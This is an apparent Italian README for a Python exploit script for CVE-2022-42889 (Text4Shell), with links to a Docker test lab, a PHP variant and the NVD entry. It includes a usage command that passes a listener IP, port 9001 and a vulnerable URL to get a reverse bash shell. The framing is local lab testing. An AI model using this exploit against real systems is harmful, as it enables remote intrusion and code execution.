
script Python per CVE-2022-42889
Script Python per CVE-2022-42889
Per testarlo localmente segui la POC docker: https://github.com/karthikuj/cve-2022-42889-text4shell-docker
Per una versione PHP di questo: https://github.com/ClickCyber/cve-2022-42889
Se stai eseguendo questo e lo stai sfruttando localmente, l'IP che devi usare è il gateway generato quando viene creato il container docker
Dopo aver ottenuto una shell bash sul container docker

Assicurati di rendere eseguibile lo script con chmod
./cve-2022-42889.py 172.17.0.1 9001 'http://localhost/text4shell/attack?search='

NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-42889